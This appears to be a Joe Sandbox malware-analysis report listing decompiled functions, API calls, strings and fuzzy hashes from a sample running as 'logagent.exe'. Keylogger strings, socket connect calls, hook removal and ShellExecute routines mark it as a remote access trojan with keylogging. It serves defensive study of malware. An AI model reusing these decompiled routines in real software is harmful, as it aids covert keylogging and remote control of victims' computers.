                                  • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                  • Opcode Fuzzy Hash: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                  • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406CFF Relevance: 7.5, APIs: 5, Instructions: 25fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E00406CFF(WCHAR* __eax, void* __ecx) {
				WCHAR* _t5;
				signed int _t8;
				signed int _t9;
				void* _t15;

				_t15 = __ecx;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t5 = DeleteFileW(__eax);
				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);
				if(_t5 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					RemoveDirectoryW(_t5);
				}
				return _t9;
			}







                                  0x00406d01
                                  0x00406d06
                                  0x00406d0d
                                  0x00406d15
                                  0x00406d21
                                  0x00406d2b
                                  0x00406d2f
                                  0x00406d36
                                  0x00406d36
                                  0x00406d40

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                  • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                  • String ID:
                                  • API String ID: 1823182134-0
                                  • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                  • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D7E4 Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E0040D7E4(void* __eflags) {
				char* _t5;
				void* _t19;

				_t5 = E0040180C(_t19 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				CloseWindow(atoi(_t5));
				E004017DD(_t19 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                  0x0040d7e9
                                  0x0040d7f0
                                  0x0040d7ff
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7F0
                                  • atoi.MSVCRT ref: 0040D7F7
                                  • CloseWindow.USER32 ref: 0040D7FF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@CloseWindowatoi
                                  • String ID:
                                  • API String ID: 14144500-0
                                  • Opcode ID: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                  • Instruction ID: fbc29b80efd9e4125448cee2552d84d25da0c547aa8720e2220b6587ca76b5c9
                                  • Opcode Fuzzy Hash: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                  • Instruction Fuzzy Hash: 26E0E532910518CBDB04ABF1EC5DAEDB734FB90316B00883AE012E30E0EF785945CB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004050C0 Relevance: 7.5, APIs: 5, Instructions: 16COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1976170855-0
                                  • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                  • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10550F83 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 105513D5: CreateDCA.GDI32(00416A4C,00000000,00000000,00000000), ref: 105513EB
                                    • Part of subcall function 105513D5: CreateCompatibleDC.GDI32(00000000), ref: 105513F7
                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 10551016
                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 10551063
                                  • _itoa.MSVCRT ref: 105510EB
                                    • Part of subcall function 105439C7: socket.WS2_32(00000000,00000001,00000006), ref: 105439E2
                                    • Part of subcall function 10543A2A: connect.WS2_32(0041B240,0041B244,00000010), ref: 10543A40
                                    • Part of subcall function 10543AA7: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 10543ABC
                                    • Part of subcall function 105540A7: _itoa.MSVCRT ref: 105540C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$Stream_itoa$CompatibleThreadconnectsocket
                                  • String ID: \nA
                                  • API String ID: 159159912-1614952937
                                  • Opcode ID: 887fefdff4b9106ef7b153adbaebfe2e04036b8f53b5bc635dc1b2e5bd886e97
                                  • Instruction ID: b939c248a2a7e6bf0cc2867cce83b4bfa739b1a2636a66479e610c562e7b032f
                                  • Opcode Fuzzy Hash: 887fefdff4b9106ef7b153adbaebfe2e04036b8f53b5bc635dc1b2e5bd886e97
                                  • Instruction Fuzzy Hash: B591427290021DEBDB14DFA0DC59EEE7B7DEF44201F10856AF816E7150EB746A48CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054EC35 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 198sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EventSleep
                                  • String ID: $
                                  • API String ID: 3275870920-3993045852
                                  • Opcode ID: 74350d5794e9d1ddc4f047256346b843da24c49d7deff20e03ded8982447acdf
                                  • Instruction ID: cc1d7faac4514fc19243646ab13af6a10a2cebfe12d0850823233943f7d9729a
                                  • Opcode Fuzzy Hash: 74350d5794e9d1ddc4f047256346b843da24c49d7deff20e03ded8982447acdf
                                  • Instruction Fuzzy Hash: 3F616176900118EFDB04EBA4DC9D9EE7B78EF84340F50886AF512D71A1EF706A48CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10544A7B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON
                                  Download Yara Rule
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000), ref: 10544B5B
                                  • exit.MSVCRT ref: 10544B67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShellexit
                                  • String ID: C:\Windows\SysWOW64\logagent.exe$origmsc
                                  • API String ID: 137663079-2557571477
                                  • Opcode ID: ddc5c2cbe83fe2f2ac0e72afd0d9be2be7e0f738db7ff9288bf545ae16f157ff
                                  • Instruction ID: 7353cb4657106ea7f52f2668683cdb3595eff930321c7d2a2c3351ee2dd03edb
                                  • Opcode Fuzzy Hash: ddc5c2cbe83fe2f2ac0e72afd0d9be2be7e0f738db7ff9288bf545ae16f157ff
                                  • Instruction Fuzzy Hash: FC218376A40509EBD704A7A0DD8EEEE7B2CDBC4751F604036F502E6190EAB459408BB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10547659 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E10547659(struct HHOOK__** __ecx) {
				char _v5;
				char _v6;
				void* _t9;
				struct HHOOK__* _t19;
				struct HHOOK__** _t33;

				_push(__ecx);
				_t33 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					_t9 = 0;
				} else {
					 *0x415318( &_v5);
					E10547762(__ecx);
					 *0x415318();
					 *0x415318();
					E105539CA("[INFO]",  &_v6, 0x415aa4,  &_v5, 0x415aa4);
					_t33[0xf] = 0;
					_t33[0xa] = 0;
					CloseHandle(_t33[0xd]);
					if(_t33[0xf] == 0) {
						_t19 =  *_t33;
						if(_t19 != 0) {
							UnhookWindowsHookEx(_t19);
							 *_t33 = 0;
						}
					}
					_t9 = 1;
				}
				return _t9;
			}








                                  0x1054765c
                                  0x1054765f
                                  0x10547667
                                  0x105476d8
                                  0x10547669
                                  0x10547678
                                  0x10547680
                                  0x1054768f
                                  0x105476a3
                                  0x105476a9
                                  0x105476b1
                                  0x105476b7
                                  0x105476ba
                                  0x105476c3
                                  0x105476c5
                                  0x105476c9
                                  0x105476cc
                                  0x105476d2
                                  0x105476d2
                                  0x105476c9
                                  0x105476d4
                                  0x105476d4
                                  0x105476de

                                  APIs
                                    • Part of subcall function 10547762: GetLocalTime.KERNEL32(?,?,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,10546B55), ref: 10547770
                                    • Part of subcall function 10547762: malloc.MSVCRT ref: 105477C6
                                    • Part of subcall function 10547762: sprintf.MSVCRT ref: 105477F8
                                    • Part of subcall function 10547762: SetEvent.KERNEL32(?), ref: 10547824
                                    • Part of subcall function 10547762: ??3@YAXPAX@Z.MSVCRT ref: 1054782B
                                    • Part of subcall function 105539CA: GetLocalTime.KERNEL32(?), ref: 105539E1
                                    • Part of subcall function 105539CA: printf.MSVCRT ref: 10553A4E
                                  • CloseHandle.KERNEL32(?), ref: 105476BA
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 105476CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime$??3@CloseEventHandleHookUnhookWindowsmallocprintfsprintf
                                  • String ID: Online Keylogger Stopped$[INFO]
                                  • API String ID: 547747356-2146459034
                                  • Opcode ID: 860fbde85192dd7b6597efc6834a2cf610bdab54b31f9bfde00621dbe1de695b
                                  • Instruction ID: 358d029a370fb5c3c29b7bf3bacbe616ff850e9ea57b301d97533ab836408334
                                  • Opcode Fuzzy Hash: 860fbde85192dd7b6597efc6834a2cf610bdab54b31f9bfde00621dbe1de695b
                                  • Instruction Fuzzy Hash: 3901F575610A48AF9700AB68DD898FEBFBDEA81190350486DE842C3600E771AD488BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10546836 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E10546836(void* __ecx, void* __edx) {
				void* _t17;
				intOrPtr* _t18;
				void* _t38;
				signed int _t40;
				void* _t45;
				intOrPtr _t47;

				_t38 = __edx;
				L10555859();
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t45 - 0x10)) = _t47;
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				_t40 = 0;
				 *(_t45 - 0x14) = 0;
				while(1) {
					_t17 = E105468FE(0x41b8d8);
					_t50 = _t40 - _t17;
					if(_t40 >= _t17) {
						break;
					}
					_t18 = E10546914(0x41b8d8, _t38, _t50, _t40);
					_t51 =  *_t18 -  *((intOrPtr*)(_t45 + 8));
					if( *_t18 ==  *((intOrPtr*)(_t45 + 8))) {
						_push( *((intOrPtr*)( *((intOrPtr*)(E10546914(0x41b8d8, _t38, _t51, _t40) + 8)))));
						L10555B17();
						TerminateThread( *(E10546914(0x41b8d8, _t38, _t51, _t40) + 4), 0);
						E10546941(0x41b8d8, E1054BC06(0x41b8d8) + (_t40 + _t40 * 2) * 4);
					}
					_t40 = _t40 + 1;
					 *(_t45 - 0x14) = _t40;
				}
				_t13 = _t45 - 4;
				 *_t13 =  *(_t45 - 4) | 0xffffffff;
				__eflags =  *_t13;
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t17;
			}









                                  0x10546836
                                  0x1054683b
                                  0x10546840
                                  0x10546841
                                  0x10546845
                                  0x10546848
                                  0x1054684c
                                  0x1054684e
                                  0x10546856
                                  0x10546858
                                  0x1054685d
                                  0x1054685f
                                  0x00000000
                                  0x00000000
                                  0x10546864
                                  0x1054686b
                                  0x1054686e
                                  0x1054687b
                                  0x1054687d
                                  0x1054688f
                                  0x105468a5
                                  0x105468a5
                                  0x105468aa
                                  0x105468ab
                                  0x105468ab
                                  0x105468b6
                                  0x105468b6
                                  0x105468b6
                                  0x105468bd
                                  0x105468c8

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 1054683B
                                  • closesocket.WS2_32(?), ref: 1054687D
                                  • TerminateThread.KERNEL32(?,00000000,?,00000000,?,?,?,?,10546580,00000000), ref: 1054688F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: H_prologTerminateThreadclosesocket
                                  • String ID: $BA
                                  • API String ID: 1123047452-59861935
                                  • Opcode ID: 4612aca2cedbb1d56acc8d6422a985439a51e254ee7cf11d244eb5bf3264ca34
                                  • Instruction ID: acda21bac7246d83f130e974bb7d2651b3327736bfb58576b2d5a87e91fedf57
                                  • Opcode Fuzzy Hash: 4612aca2cedbb1d56acc8d6422a985439a51e254ee7cf11d244eb5bf3264ca34
                                  • Instruction Fuzzy Hash: 0001A135B00511EFDB05DF58C859BEDBBA9EFC4A54F20412AF002E7160EBB46E018AA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402750 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(KeepAlive Disabled!,?,0041BE70,0041BE70), ref: 00402771
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([WARNING],?), ref: 00402785
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: KeepAlive Disabled!$[WARNING]
                                  • API String ID: 2944585167-3856563802
                                  • Opcode ID: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction ID: a30e930004435671851b5eafd83b9c9ec9f6d71b75df5e3fdd77de3efe23ec90
                                  • Opcode Fuzzy Hash: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction Fuzzy Hash: F3F027705103187FEB10B729C94EBEE7F8C8742354F40006AEC11532C1E6F9A9C486EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401895 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                    • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 004018A2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 1986322901-3016609489
                                  • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                  • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040500C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 00405019
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 3609083747-3016609489
                                  • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                  • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412019 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412019() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x41c1dc = _t2;
				return _t2;
			}




                                  0x0041202f
                                  0x00412035
                                  0x0041203a

                                  APIs
                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetLastInputInfo$User32.dll
                                  • API String ID: 2574300362-1519888992
                                  • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                  • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F4AE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040F4AE() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x41bf1c = _t2;
				return _t2;
			}




                                  0x0040f4c4
                                  0x0040f4ca
                                  0x0040f4cf

                                  APIs
                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
